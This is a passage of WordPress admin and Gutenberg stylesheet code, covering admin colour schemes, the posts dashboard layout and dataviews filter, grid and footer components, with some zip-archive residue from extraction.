(min-resolution:192dpi){body.admin-color-ocean{--wp-admin-border-width-focus:1.5px}}body.admin-color-sunrise{--wp-admin-theme-color:#dd823b;--wp-admin-theme-color--rgb:221,130,59;--wp-admin-theme-color-darker-10:#d97426;--wp-admin-theme-color-darker-10--rgb:216.8782608696,116.1847826087,37.6217391304;--wp-admin-theme-color-darker-20:#c36922;--wp-admin-theme-color-darker-20--rgb:195.147826087,104.5434782609,33.852173913;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-sunrise{--wp-admin-border-width-focus:1.5px}}#adminmenumain,#wpadminbar{display:none}#wpcontent{margin-right:0}body.js #wpbody{padding-top:0}body{background:#fff}body #wpcontent{padding-right:0}body #wpbody-content{padding-bottom:0}body #wpbody-content>div:not(#gutenberg-posts-dashboard):not(#screen-meta),body #wpfooter{display:none}body .a11y-speak-region{right:-1px;top:-1px}body ul#adminmenu a.wp-has-current-submenu:after,body ul#adminmenu>li.current>a.current:after{border-left-color:#fff}body .media-frame select.attachment-filters:last-of-type{max-width:100%;width:auto}#gutenberg-posts-dashboard{box-sizing:border-box}#gutenberg-posts-dashboard *,#gutenberg-posts-dashboard :after,#gutenberg-posts-dashboard :before{box-sizing:inherit}#gutenberg-posts-dashboard{height:100vh}@media (min-width:600px){#gutenberg-posts-dashboard{bottom:0;left:0;min-height:100vh;position:fixed;right:0;top:0}}.no-js #gutenberg-posts-dashboard{min-height:0;position:static}#gutenberg-posts-dashboard .components-editor-notices__snackbar{bottom:16px;left:0;padding-left:16px;padding-right:16px;position:fixed}PK!N;`1`1dist/edit-site/posts.cssnuȯ@charset "UTF-8"; :root{ --wp-block-synced-color:#7a00df; --wp-block-synced-color--rgb:122, 0, 223; --wp-bound-block-color:var(--wp-block-synced-color); --wp-editor-canvas-background:#ddd; --wp-admin-theme-color:#007cba; --wp-admin-theme-color--rgb:0, 124, 186; --wp-admin-theme-color-darker-10:#006ba1; --wp-admin-theme-color-darker-10--rgb:0, 107, 160.5; --wp-admin-theme-color-darker-20:#005a87; --wp-admin-theme-color-darker-20--rgb:0, 90, 135; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ :root{ --wp-admin-border-width-focus:1.5px; } } .admin-ui-page{ background-color:#fff; color:#2f2f2f; container:admin-ui-page/inline-size; display:flex; flex-flow:column; height:100%; position:relative; z-index:1; } @media not (prefers-reduced-motion){ .admin-ui-page{ transition:width .2s ease-out; } } .admin-ui-page__header{ background:#fff; border-bottom:1px solid #f0f0f0; padding:16px 48px; position:sticky; top:0; } @container (max-width: 430px){ .admin-ui-page__header{ padding:16px 24px; } } .admin-ui-page__header-subtitle{ color:#757575; font-family:-apple-system,"system-ui",Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; font-weight:400; line-height:20px; margin:0; padding-block-end:8px; } .admin-ui-page__content{ display:flex; flex-direction:column; flex-grow:1; overflow:auto; } .admin-ui-page__content.has-padding{ padding:16px 20px; } @container (max-width: 430px){ .admin-ui-page__content.has-padding{ padding:16px 24px; } } .show-icon-labels .admin-ui-page__header-actions .components-button.has-icon{ padding:0 8px; width:auto; } .show-icon-labels .admin-ui-page__header-actions .components-button.has-icon svg{ display:none; } .show-icon-labels .admin-ui-page__header-actions .components-button.has-icon:after{ content:attr(aria-label); font-size:12px; } .dataviews-picker-wrapper,.dataviews-wrapper{ box-sizing:border-box; container:dataviews-wrapper/inline-size; display:flex; flex-direction:column; font-size:13px; height:100%; line-height:1.4; overflow:auto; scroll-padding-bottom:64px; } .dataviews-filters__container,.dataviews__view-actions{ box-sizing:border-box; flex-shrink:0; left:0; padding:16px 48px; position:sticky; } @media not (prefers-reduced-motion){ .dataviews-filters__container,.dataviews__view-actions{ transition:padding .1s ease-out; } } .dataviews-loading,.dataviews-no-results{ align-items:center; display:flex; flex-grow:1; justify-content:center; padding:0 48px; } @media not (prefers-reduced-motion){ .dataviews-loading,.dataviews-no-results{ transition:padding .1s ease-out; } } .dataviews-loading-more{ text-align:center; } @container (max-width: 430px){ .dataviews-filters__container,.dataviews__view-actions{ padding:12px 24px; } .dataviews-loading,.dataviews-no-results{ padding-left:24px; padding-right:24px; } } .dataviews-title-field{ font-size:13px; font-weight:500; width:100%; } .dataviews-title-field,.dataviews-title-field a{ color:#2f2f2f; text-overflow:ellipsis; white-space:nowrap; } .dataviews-title-field a{ display:block; flex-grow:0; overflow:hidden; text-decoration:none; } .dataviews-title-field a:hover{ color:var(--wp-admin-theme-color); } .dataviews-title-field a:focus{ border-radius:2px; box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color, #007cba); color:var(--wp-admin-theme-color--rgb); } .dataviews-title-field button.components-button.is-link{ color:#1e1e1e; display:block; font-weight:inherit; overflow:hidden; text-decoration:none; text-overflow:ellipsis; white-space:nowrap; width:100%; } .dataviews-title-field button.components-button.is-link:hover{ color:var(--wp-admin-theme-color); } .dataviews-title-field--clickable{ color:#2f2f2f; cursor:pointer; } .dataviews-title-field--clickable:hover{ color:var(--wp-admin-theme-color); } .dataviews-title-field--clickable:focus{ border-radius:2px; box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color, #007cba); color:var(--wp-admin-theme-color--rgb); } .components-card__body:has(>.dataviews-picker-wrapper),.components-card__body:has(>.dataviews-wrapper){ overflow:hidden; padding:8px 0 0; } .components-card__body:has(>.dataviews-picker-wrapper) .dataviews-filters__container,.components-card__body:has(>.dataviews-picker-wrapper) .dataviews-footer,.components-card__body:has(>.dataviews-picker-wrapper) .dataviews-loading,.components-card__body:has(>.dataviews-picker-wrapper) .dataviews-no-results,.components-card__body:has(>.dataviews-picker-wrapper) .dataviews-view-grid,.components-card__body:has(>.dataviews-picker-wrapper) .dataviews__view-actions,.components-card__body:has(>.dataviews-wrapper) .dataviews-filters__container,.components-card__body:has(>.dataviews-wrapper) .dataviews-footer,.components-card__body:has(>.dataviews-wrapper) .dataviews-loading,.components-card__body:has(>.dataviews-wrapper) .dataviews-no-results,.components-card__body:has(>.dataviews-wrapper) .dataviews-view-grid,.components-card__body:has(>.dataviews-wrapper) .dataviews__view-actions{ padding-inline:24px; } .components-card__body:has(>.dataviews-picker-wrapper) .dataviews-view-table tr td:first-child,.components-card__body:has(>.dataviews-picker-wrapper) .dataviews-view-table tr th:first-child,.components-card__body:has(>.dataviews-wrapper) .dataviews-view-table tr td:first-child,.components-card__body:has(>.dataviews-wrapper) .dataviews-view-table tr th:first-child{ padding-inline-start:24px; } .components-card__body:has(>.dataviews-picker-wrapper) .dataviews-view-table tr td:last-child,.components-card__body:has(>.dataviews-picker-wrapper) .dataviews-view-table tr th:last-child,.components-card__body:has(>.dataviews-wrapper) .dataviews-view-table tr td:last-child,.components-card__body:has(>.dataviews-wrapper) .dataviews-view-table tr th:last-child{ padding-inline-end:24px; } .dataviews-bulk-actions-footer__item-count{ color:#1e1e1e; font-size:11px; font-weight:500; text-transform:uppercase; } .dataviews-bulk-actions-footer__container{ margin-right:auto; min-height:32px; } .dataviews-filters__button{ position:relative; } .dataviews-filters__container{ padding-top:0; } .dataviews-filters__reset-button.dataviews-filters__reset-button[aria-disabled=true],.dataviews-filters__reset-button.dataviews-filters__reset-button[aria-disabled=true]:hover{ opacity:0; } .dataviews-filters__reset-button.dataviews-filters__reset-button[aria-disabled=true]:focus{ opacity:1; } .dataviews-filters__summary-popover{ font-size:13px; line-height:1.4; } .dataviews-filters__summary-popover .components-popover__content{ border-radius:4px; max-width:250px; min-width:230px; width:100%; } .dataviews-filters__summary-popover.components-dropdown__content .components-popover__content{ padding:0; } .dataviews-filters__summary-operators-container{ padding:8px 16px; } .dataviews-filters__summary-operators-container:has(+.dataviews-filters__search-widget-listbox),.dataviews-filters__summary-operators-container:has(+.dataviews-filters__search-widget-no-elements),.dataviews-filters__summary-operators-container:has(+.dataviews-filters__user-input-widget){ border-bottom:1px solid #e0e0e0; } .dataviews-filters__summary-operators-container:empty{ display:none; } .dataviews-filters__summary-operators-container .dataviews-filters__summary-operators-filter-name{ color:#757575; flex-shrink:0; max-width:calc(100% - 55px); overflow:hidden; text-overflow:ellipsis; white-space:nowrap; } .dataviews-filters__summary-operators-container .dataviews-filters__summary-operators-filter-select{ overflow:hidden; white-space:nowrap; width:100%; } .dataviews-filters__summary-chip-container{ position:relative; white-space:pre-wrap; } .dataviews-filters__summary-chip-container .dataviews-filters__summary-chip{ align-items:center; background:#f0f0f0; border:1px solid #0000; border-radius:16px; box-sizing:border-box; color:#2f2f2f; cursor:pointer; display:flex; min-height:32px; padding:4px 12px; position:relative; } .dataviews-filters__summary-chip-container .dataviews-filters__summary-chip.is-not-clickable{ cursor:default; } .dataviews-filters__summary-chip-container .dataviews-filters__summary-chip.has-reset{ padding-inline-end:28px; } .dataviews-filters__summary-chip-container .dataviews-filters__summary-chip:focus-visible,.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip:hover:not(.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip.is-not-clickable),.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip[aria-expanded=true]{ background:#e0e0e0; color:#1e1e1e; } .dataviews-filters__summary-chip-container .dataviews-filters__summary-chip.has-values{ background:rgba(var(--wp-admin-theme-color--rgb), .04); color:var(--wp-admin-theme-color); } .dataviews-filters__summary-chip-container .dataviews-filters__summary-chip.has-values:hover,.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip.has-values[aria-expanded=true]{ background:rgba(var(--wp-admin-theme-color--rgb), .12); } .dataviews-filters__summary-chip-container .dataviews-filters__summary-chip:focus-visible{ box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); outline:none; } .dataviews-filters__summary-chip-container .dataviews-filters__summary-chip .dataviews-filters-__summary-filter-text-name{ font-weight:500; } .dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove{ align-items:center; background:#0000; border:0; border-radius:50%; cursor:pointer; display:flex; height:24px; justify-content:center; padding:0; position:absolute; right:4px; top:50%; transform:translateY(-50%); width:24px; } .dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove svg{ fill:#757575; } .dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove:focus,.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove:hover{ background:#e0e0e0; } .dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove:focus svg,.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove:hover svg{ fill:#1e1e1e; } .dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove.has-values svg{ fill:var(--wp-admin-theme-color); } .dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove.has-values:hover{ background:rgba(var(--wp-admin-theme-color--rgb), .08); } .dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove:focus-visible{ box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); outline:none; } .dataviews-filters__search-widget-filter-combobox-list{ border-top:1px solid #e0e0e0; max-height:184px; overflow:auto; padding:4px; } .dataviews-filters__search-widget-filter-combobox-list .dataviews-filters__search-widget-filter-combobox-item-value [data-user-value]{ font-weight:600; } .dataviews-filters__search-widget-listbox{ overflow:auto; padding:4px; } .dataviews-filters__search-widget-listitem{ align-items:center; border-radius:2px; box-sizing:border-box; cursor:default; display:flex; font-family:-apple-system,"system-ui",Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; font-weight:400; gap:8px; line-height:20px; min-height:32px; padding:4px 12px; } .dataviews-filters__search-widget-listitem:last-child{ margin-block-end:0; } .dataviews-filters__search-widget-listitem:focus,.dataviews-filters__search-widget-listitem:hover,.dataviews-filters__search-widget-listitem[data-active-item]{ background-color:var(--wp-admin-theme-color); color:#fff; } .dataviews-filters__search-widget-listitem:focus .dataviews-filters__search-widget-listitem-description,.dataviews-filters__search-widget-listitem:hover .dataviews-filters__search-widget-listitem-description,.dataviews-filters__search-widget-listitem[data-active-item] .dataviews-filters__search-widget-listitem-description{ color:#fff; } .dataviews-filters__search-widget-listitem:focus .dataviews-filters__search-widget-listitem-single-selection,.dataviews-filters__search-widget-listitem:hover .dataviews-filters__search-widget-listitem-single-selection,.dataviews-filters__search-widget-listitem[data-active-item] .dataviews-filters__search-widget-listitem-single-selection{ background:#fff; border-color:var(--wp-admin-theme-color-darker-20, #183ad6); } .dataviews-filters__search-widget-listitem:focus .dataviews-filters__search-widget-listitem-single-selection.is-selected,.dataviews-filters__search-widget-listitem:hover .dataviews-filters__search-widget-listitem-single-selection.is-selected,.dataviews-filters__search-widget-listitem[data-active-item] .dataviews-filters__search-widget-listitem-single-selection.is-selected{ background:var(--wp-admin-theme-color-darker-20, #183ad6); border-color:var(--wp-admin-theme-color-darker-20, #183ad6); } .dataviews-filters__search-widget-listitem:focus .dataviews-filters__search-widget-listitem-multi-selection,.dataviews-filters__search-widget-listitem:hover .dataviews-filters__search-widget-listitem-multi-selection,.dataviews-filters__search-widget-listitem[data-active-item] .dataviews-filters__search-widget-listitem-multi-selection{ border-color:var(--wp-admin-theme-color-darker-20, #183ad6); } .dataviews-filters__search-widget-listitem:focus .dataviews-filters__search-widget-listitem-multi-selection.is-selected,.dataviews-filters__search-widget-listitem:hover .dataviews-filters__search-widget-listitem-multi-selection.is-selected,.dataviews-filters__search-widget-listitem[data-active-item] .dataviews-filters__search-widget-listitem-multi-selection.is-selected{ background:var(--wp-admin-theme-color-darker-20, #183ad6); border-color:var(--wp-admin-theme-color-darker-20, #183ad6); } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-description{ color:#757575; display:block; font-size:12px; line-height:16px; overflow:hidden; text-overflow:ellipsis; } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection{ border:1px solid #1e1e1e; border-radius:50%; height:24px; margin-right:12px; max-width:24px; min-width:24px; position:relative; transition:none; width:24px; } @media not (prefers-reduced-motion){ .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection{ transition:box-shadow .1s linear; } } @media (min-width:600px){ .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection{ height:16px; max-width:16px; min-width:16px; width:16px; } } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection:checked:before{ background-color:#fff; border:4px solid #fff; box-sizing:inherit; height:12px; left:50%; margin:0; position:absolute; top:50%; transform:translate(-50%, -50%); width:12px; } @media (min-width:600px){ .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection:checked:before{ height:8px; width:8px; } } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection:focus{ box-shadow:0 0 0 2px #fff, 0 0 0 4px var(--wp-admin-theme-color); outline:2px solid #0000; } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection:checked{ background:var(--wp-admin-theme-color); border:none; } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection{ margin:0; padding:0; } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection.is-selected{ background:var(--wp-admin-theme-color, #3858e9); border-color:var(--wp-admin-theme-color, #3858e9); } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection.is-selected:before{ background-color:#fff; border:4px solid #fff; border-radius:50%; box-sizing:inherit; content:""; height:12px; left:50%; margin:0; position:absolute; top:50%; transform:translate(-50%, -50%); width:12px; } @media (min-width:600px){ .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection.is-selected:before{ height:8px; width:8px; } } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection{ --checkbox-size:24px; border:1px solid #949494; border-radius:2px; box-shadow:0 0 0 #0000; font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:16px; line-height:normal; margin-right:12px; padding:6px 8px; transition:none; } @media not (prefers-reduced-motion){ .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection{ transition:box-shadow .1s linear; } } @media (min-width:600px){ .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection{ font-size:13px; line-height:normal; } } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection:focus{ border-color:var(--wp-admin-theme-color); box-shadow:0 0 0 .5px var(--wp-admin-theme-color); } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection::-webkit-input-placeholder{ color:#1e1e1e9e; } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection::-moz-placeholder{ color:#1e1e1e9e; } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection:-ms-input-placeholder{ color:#1e1e1e9e; } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection:focus{ box-shadow:0 0 0 2px #fff, 0 0 0 4px var(--wp-admin-theme-color); outline:2px solid #0000; } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection:checked{ background:var(--wp-admin-theme-color); border-color:var(--wp-admin-theme-color); } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection:checked::-ms-check{ opacity:0; } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection:checked:before,.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection[aria-checked=mixed]:before{ color:#fff; margin:-3px -5px; } @media (min-width:782px){ .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection:checked:before,.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection[aria-checked=mixed]:before{ margin:-4px 0 0 -5px; } } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection[aria-checked=mixed]{ background:var(--wp-admin-theme-color); border-color:var(--wp-admin-theme-color); } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection[aria-checked=mixed]:before{ content:"\f460"; display:inline-block; float:left; font:normal 30px/1 dashicons; vertical-align:middle; width:16px; speak:none; -webkit-font-smoothing:antialiased; -moz-osx-font-smoothing:grayscale; } @media (min-width:782px){ .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection[aria-checked=mixed]:before{ float:none; font-size:21px; } } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection:disabled,.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection[aria-disabled=true]{ background:#f0f0f0; border-color:#ddd; cursor:default; opacity:1; } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection{ background:#fff; color:#1e1e1e; height:var(--checkbox-size); margin:0; padding:0; position:relative; width:var(--checkbox-size); } @media (min-width:600px){ .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection{ --checkbox-size:16px; } } @media not (prefers-reduced-motion){ .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection{ transition:border-color .1s ease-in-out; } } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection.is-selected{ background:var(--wp-admin-theme-color, #3858e9); border-color:var(--wp-admin-theme-color, #3858e9); } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection.is-selected svg{ --checkmark-size:var(--checkbox-size); fill:#fff; height:var(--checkmark-size); left:50%; position:absolute; top:50%; transform:translate(-50%, -50%); width:var(--checkmark-size); } @media (min-width:600px){ .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection.is-selected svg{ --checkmark-size:calc(var(--checkbox-size) + 4px); } } .dataviews-filters__search-widget-filter-combobox__wrapper{ padding:8px; position:relative; } .dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input{ border:1px solid #949494; border-radius:2px; box-shadow:0 0 0 #0000; font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; line-height:normal; padding:6px 8px; } @media not (prefers-reduced-motion){ .dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input{ transition:box-shadow .1s linear; } } @media (min-width:600px){ .dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input{ font-size:13px; line-height:normal; } } .dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input:focus{ border-color:var(--wp-admin-theme-color); box-shadow:0 0 0 .5px var(--wp-admin-theme-color); outline:2px solid #0000; } .dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input::-webkit-input-placeholder{ color:#1e1e1e9e; } .dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input::-moz-placeholder{ color:#1e1e1e9e; } .dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input:-ms-input-placeholder{ color:#1e1e1e9e; } .dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input{ display:block; font-size:16px; height:32px; margin-left:0; margin-right:0; padding:0 8px 0 32px; width:100%; } @media (min-width:600px){ .dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input{ font-size:13px; } } .dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input:focus{ background:#fff; box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); } .dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input::placeholder{ color:#757575; } .dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input::-webkit-search-cancel-button,.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input::-webkit-search-decoration,.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input::-webkit-search-results-button,.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input::-webkit-search-results-decoration{ -webkit-appearance:none; } .dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__icon{ align-items:center; bottom:0; display:flex; inset-inline-start:12px; justify-content:center; position:absolute; top:0; width:24px; } .dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__icon:dir(ltr){ transform:scaleX(-1); } .dataviews-filters__container-visibility-toggle{ flex-shrink:0; position:relative; } .dataviews-filters-toggle__count{ background:var(--wp-admin-theme-color, #3858e9); border-radius:8px; box-sizing:border-box; color:#fff; font-size:11px; height:16px; line-height:16px; min-width:16px; outline:var(--wp-admin-border-width-focus) solid #fff; padding:0 4px; position:absolute; right:0; text-align:center; top:0; transform:translate(50%, -50%); } .dataviews-search{ width:fit-content; } .dataviews-filters__user-input-widget{ padding:16px; } .dataviews-filters__user-input-widget .components-input-control__prefix{ padding-left:8px; } .dataviews-filters__search-widget-no-elements{ align-items:center; display:flex; justify-content:center; padding:16px; } .dataviews-footer{ background-color:#fff; border-top:1px solid #f0f0f0; bottom:0; flex-shrink:0; left:0; padding:12px 48px; position:sticky; } @media not (prefers-reduced-motion){ .dataviews-footer{ transition:padding .1s ease-out; } } .dataviews-footer{ z-index:2; } @container (max-width: 430px){ .dataviews-footer{ padding:12px 24px; } } @container (max-width: 560px){ .dataviews-footer{ flex-direction:column !important; } .dataviews-footer .dataviews-bulk-actions-footer__container{ width:100%; } .dataviews-footer .dataviews-bulk-actions-footer__item-count{ flex-grow:1; } .dataviews-footer .dataviews-pagination{ justify-content:space-between; width:100%; } } .dataviews-pagination__page-select{ font-size:11px; font-weight:500; text-transform:uppercase; } @media (min-width:600px){ .dataviews-pagination__page-select .components-select-control__input{ font-size:11px !important; font-weight:500; } } .dataviews-action-modal{ z-index:1000001; } .dataviews-picker-footer__bulk-selection{ align-self:flex-start; height:32px; } .dataviews-picker-footer__actions{ align-self:flex-end; } .dataviews-selection-checkbox{ --checkbox-input-size:24px; } @media (min-width:600px){ .dataviews-selection-checkbox{ --checkbox-input-size:16px; } } .dataviews-selection-checkbox{ flex-shrink:0; line-height:0; } .dataviews-selection-checkbox .components-checkbox-control__input-container{ margin:0; } .dataviews-view-config{ container-type:inline-size; font-size:13px; line-height:1.4; width:320px; } .dataviews-config__popover.is-expanded .dataviews-config__popover-content-wrapper{ height:100%; overflow-y:scroll; } .dataviews-config__popover.is-expanded .dataviews-config__popover-content-wrapper .dataviews-view-config{ width:auto; } .dataviews-view-config__sort-direction .components-toggle-group-control-option-base{ text-transform:uppercase; } .dataviews-settings-section__title.dataviews-settings-section__title{ font-size:15px; line-height:24px; } .dataviews-settings-section__sidebar{ grid-column:span 4; } .dataviews-settings-section__content,.dataviews-settings-section__content>*{ grid-column:span 8; } .dataviews-settings-section__content .is-divided-in-two{ display:contents; } .dataviews-settings-section__content .is-divided-in-two>*{ grid-column:span 4; } .dataviews-settings-section:has(.dataviews-settings-section__content:empty){ display:none; } @container (max-width: 500px){ .dataviews-settings-section.dataviews-settings-section{ grid-template-columns:repeat(2, 1fr); } .dataviews-settings-section.dataviews-settings-section .dataviews-settings-section__content,.dataviews-settings-section.dataviews-settings-section .dataviews-settings-section__sidebar{ grid-column:span 2; } } .dataviews-field-control__field{ height:32px; } .dataviews-field-control__actions{ position:absolute; top:-9999em; } .dataviews-field-control__actions.dataviews-field-control__actions{ gap:4px; } .dataviews-field-control__field.is-interacting .dataviews-field-control__actions,.dataviews-field-control__field:focus-within .dataviews-field-control__actions,.dataviews-field-control__field:hover .dataviews-field-control__actions{ position:unset; top:unset; } .dataviews-field-control__icon{ display:flex; width:24px; } .dataviews-field-control__label-sub-label-container{ flex-grow:1; } .dataviews-field-control__label{ display:block; } .dataviews-field-control__sub-label{ color:#757575; font-size:11px; font-style:normal; margin-bottom:0; margin-top:8px; } .dataviews-view-grid-items{ container-type:inline-size; display:grid; gap:32px; grid-template-columns:repeat(auto-fill, minmax(230px, 1fr)); grid-template-rows:max-content; margin-bottom:auto; padding:0 48px 24px; } @container (max-width: 430px){ .dataviews-view-grid-items{ padding-left:24px; padding-right:24px; } } @media not (prefers-reduced-motion){ .dataviews-view-grid-items{ transition:padding .1s ease-out; } } .dataviews-view-grid .dataviews-view-grid__card{ height:100%; justify-content:flex-start; position:relative; } .dataviews-view-grid .dataviews-view-grid__card .dataviews-view-grid__title-actions{ padding:8px 0 4px; } .dataviews-view-grid .dataviews-view-grid__card .dataviews-view-grid__title-field{ align-content:center; min-height:24px; overflow:hidden; text-align:start; } .dataviews-view-grid .dataviews-view-grid__card .dataviews-view-grid__title-field--clickable{ width:fit-content; } .dataviews-view-grid .dataviews-view-grid__card.is-selected .dataviews-view-grid__fields .dataviews-view-grid__field .dataviews-view-grid__field-value{ color:#1e1e1e; } .dataviews-view-grid .dataviews-view-grid__card .dataviews-view-grid__media:focus:after,.dataviews-view-grid .dataviews-view-grid__card.is-selected .dataviews-view-grid__media:after{ background-color:rgba(var(--wp-admin-theme-color--rgb), .08); } .dataviews-view-grid .dataviews-view-grid__card.is-selected .dataviews-view-grid__media:after{ box-shadow:inset 0 0 0 1px var(--wp-admin-theme-color); } .dataviews-view-grid .dataviews-view-grid__card .dataviews-view-grid__media:focus:after{ box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); } .dataviews-view-grid .dataviews-view-grid__media{ aspect-ratio:1/1; background-color:#fff; border-radius:4px; overflow:hidden; position:relative; width:100%; } .dataviews-view-grid .dataviews-view-grid__media img{ height:100%; object-fit:cover; width:100%; } .dataviews-view-grid .dataviews-view-grid__media:after{ border-radius:4px; box-shadow:inset 0 0 0 1px #0000001a; content:""; height:100%; left:0; pointer-events:none; position:absolute; top:0; width:100%; } .dataviews-view-grid .dataviews-view-grid__fields{ font-size:12px; line-height:16px; position:relative; } .dataviews-view-grid .dataviews-view-grid__fields:not(:empty){ padding:0 0 12px; } .dataviews-view-grid .dataviews-view-grid__fields .dataviews-view-grid__field-value:not(:empty){ line-height:20px; min-height:24px; padding-top:2px; } .dataviews-view-grid .dataviews-view-grid__fields .dataviews-view-grid__field{ align-items:center; min-height:24px; } .dataviews-view-grid .dataviews-view-grid__fields .dataviews-view-grid__field .dataviews-view-grid__field-name{ color:#757575; overflow:hidden; text-overflow:ellipsis; white-space:nowrap; width:35%; } .dataviews-view-grid .dataviews-view-grid__fields .dataviews-view-grid__field .dataviews-view-grid__field-value{ overflow:hidden; text-overflow:ellipsis; white-space:nowrap; width:65%; } .dataviews-view-grid .dataviews-view-grid__fields .dataviews-view-grid__field:not(:has(.dataviews-view-grid__field-value:not(:empty))){ display:none; } .dataviews-view-grid .dataviews-view-grid__badge-fields:not(:empty){ padding-bottom:12px; } .dataviews-view-grid__field-value:empty,.dataviews-view-grid__field:empty{ display:none; } .dataviews-view-grid__card .dataviews-selection-checkbox{ left:8px; opacity:0; position:absolute; top:-9999em; z-index:1; } @media not (prefers-reduced-motion){ .dataviews-view-grid__card .dataviews-selection-checkbox{ transition:opacity .1s linear; } } @media (hover:none){ .dataviews-view-grid__card .dataviews-selection-checkbox{ opacity:1; top:8px; } } .dataviews-view-grid__card.is-selected .dataviews-selection-checkbox,.dataviews-view-grid__card:focus-within .dataviews-selection-checkbox,.dataviews-view-grid__card:hover .dataviews-selection-checkbox{ opacity:1; top:8px; } .dataviews-view-grid__card .dataviews-view-grid__media-actions{ 